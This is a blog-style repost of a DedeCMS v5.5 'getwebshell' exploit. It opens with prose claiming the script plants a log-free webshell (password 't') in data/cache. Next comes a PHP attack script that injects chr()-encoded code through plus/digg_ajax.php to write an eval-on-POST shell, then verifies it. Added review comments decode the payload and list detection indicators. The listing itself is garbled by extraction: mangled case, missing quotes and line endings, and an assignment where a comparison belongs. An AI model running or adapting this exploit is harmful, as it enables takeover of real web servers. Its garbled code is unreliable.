No official patch is available yet, but I guess one will come soon.
If execution succeeds, t.php (a small webshell) is generated in data/cache.
The password is t. This vulnerability exists in the latest official GBK and UTF-8 versions.
This exploit is characterized by leaving no log entries when it produces t.php.
<? Php
// DedeCMS v5.5 "getwebshell" exploit script as posted on the blog.
// NOTE(review): the listing is case-mangled and its quotes and line endings were
// lost during extraction, so it does not parse as PHP in this form.
Print_r (
+ ---------------------------------------- +
Dedecms v5.5 final getwebshell exploit
+ ---------------------------------------- +
);
// Usage check: the script needs two CLI arguments, host and path.
If ($ argc <3 ){
Print_r (
+ ---------------------------------------- +
Usage: php. $ argv [0]. host path
Host: target server (ip/hostname)
Path: path to dedecms
Example:
Php. $ argv [0]. localhost/dedecms/
+ ---------------------------------------- +
);
Exit;
}
// error_reporting(7) keeps only E_ERROR|E_WARNING|E_PARSE; the time limit is
// removed so slow responses do not abort the script.
Error_reporting (7 );
Ini_set (max_execution_time, 0 );
$ Host = $ argv [1];
$ Path = $ argv [2];
// Request 1: GET plus/digg_ajax.php with an `id` value that wraps a
// fputs(fopen(...)) call in PHP comment delimiters ("*/" ... "/*"). The
// fopen/fputs arguments are assembled from chr() calls; decoded they spell the
// path ../data/cache/t.php, mode "w+", and a one-line PHP shell that evaluates
// the POST field t -- the "password t" webshell named in the text above.
// Detection: an `id` parameter carrying "*/" or long chr(...) chains in a
// request to plus/digg_ajax.php is the request-level indicator.
$ Post_a = plus/digg_ajax.php? Id = 1024e1024 & */fputs (fopen (chr (46). chr (46). chr (47). chr (100). chr (97)
. Chr (116). chr (97). chr (47). chr (99). chr (97). chr (99). chr (104)
. Chr (101). chr (47). chr (116). chr (46). chr (112). chr (104)
. Chr (112), chr (119). chr (43), chr (60). chr (63). chr (112)
. Chr (104). chr (112). chr (32). chr (101). chr (118). chr (97)
. Chr (108). chr (40). chr (36). chr (95). chr (80). chr (79)
. Chr (83). chr (84). chr (91). chr (39). chr (116). chr (39)
. Chr (93). chr (41). chr (59). chr (63). chr (62 ));/*;
// Request 2: POST body for plus/comments_frame.php whose needCode value points
// at data/mysql_error_trace through a traversal-style path ("aa/.../../").
// What comments_frame.php does with needCode is not shown on this page; verify
// against the application source before relying on any description of it.
// Detection: a needCode value containing "../" or "mysql_error_trace".
$ Post_ B = needCode = aa/.../../data/mysql_error_trace;
// Post-exploitation artifact the script expects on the server: data/cache/t.php.
// Its presence (or any new .php file under data/cache) is the host-level IoC.
$ Shell = data/cache/t. php;
Get_send ($ post_a );
Post_send (plus/comments_frame.php, $ post_ B );
// Verification: POSTs t=echo tojen; to the dropped file and inspects the reply.
// The blog text says no log is produced; the web server's own access log (where
// enabled) would still record both requests and this POST to data/cache/t.php.
$ Content = post_send ($ shell, t = echo tojen ;);
// Reads the 3-character status code at offset 9 of the raw response
// ("HTTP/1.1 " is 9 bytes). NOTE(review): a single "=" is an assignment as
// printed; the intended comparison is "==", presumably lost in extraction.
If (substr ($ content, 9, 3) = 200 ){
Echo "Shell Address is:". $ host. $ path. $ shell;
} Else {
Echo "Error .";
}
// Sends a raw HTTP/1.1 GET for $path$url to $host on port 80 and returns the
// full response (status line, headers and body) as one string.
// Reads the script-level globals $host and $path; $url is the path suffix.
// NOTE(review): each header line as printed ends in a space where the CRLF
// terminator was lost in extraction; the original must have used "\r\n".
Function get_send ($ url ){
Global $ host, $ path;
$ Message = "GET". $ path. "$ url HTTP/1.1 ";
$ Message. = "Accept :*/*";
$ Message. = "Referer: http: // $ host $ path ";
$ Message. = "Accept-Language: zh-cn ";
$ Message. = "Content-Type: application/x-www-form-urlencoded ";
// Fixed User-Agent string; usable as a signature for this script's traffic.
$ Message. = "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1 )";
$ Message. = "Host: $ host ";
// Connection: Close lets the read loop below stop at EOF.
$ Message. = "Connection: Close ";
// Plain TCP to port 80 only: no TLS and no port parameter.
$ Fp = fsockopen ($ host, 80 );
// NOTE(review): on connect failure this only echoes and then keeps using $fp,
// so fputs/feof/fread run on a false handle instead of returning early.
If (! $ Fp ){
Echo "Connect to host Error ";
}
Fputs ($ fp, $ message );
// Accumulates the whole response in 1024-byte chunks until the peer closes.
$ Back =;
While (! Feof ($ fp ))
$ Back. = fread ($ fp, 1024 );
Fclose ($ fp );
Return $ back;
}
// Sends a raw HTTP/1.1 POST for $path$url to $host on port 80 with $cmd as the
// form-encoded body and returns the full response as one string.
// Reads the script-level globals $host and $path.
// NOTE(review): as with get_send, the header lines as printed end in a space
// where the CRLF terminator was lost; the blank line separating headers from
// the body is likewise missing in this rendering.
Function post_send ($ url, $ cmd ){
Global $ host, $ path;
$ Message = "POST". $ path. "$ url HTTP/1.1 ";
$ Message. = "Accept :*/*";
$ Message. = "Referer: http: // $ host $ path ";
$ Message. = "Accept-Language: zh-cn ";
$ Message. = "Content-Type: application/x-www-form-urlencoded ";
// Fixed User-Agent string; usable as a signature for this script's traffic.
$ Message. = "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1 )";
$ Message. = "Host: $ host ";
// Content-Length is the byte length of $cmd, which is appended unchanged.
$ Message. = "Content-Length:". strlen ($ cmd )."";
$ Message. = "Connection: Close ";
$ Message. = $ cmd;
// Plain TCP to port 80 only: no TLS and no port parameter.
$ Fp = fsockopen ($ host, 80 );
// NOTE(review): on connect failure this only echoes and then keeps using $fp,
// so fputs/feof/fread run on a false handle instead of returning early.
If (! $ Fp ){
Echo "Connect to host Error ";
}
Fputs ($ fp, $ message );
// Accumulates the whole response in 1024-byte chunks until the peer closes.
$ Back =;
While (! Feof ($ fp ))
$ Back. = fread ($ fp, 1024 );
Fclose ($ fp );
Return $ back;
}
?>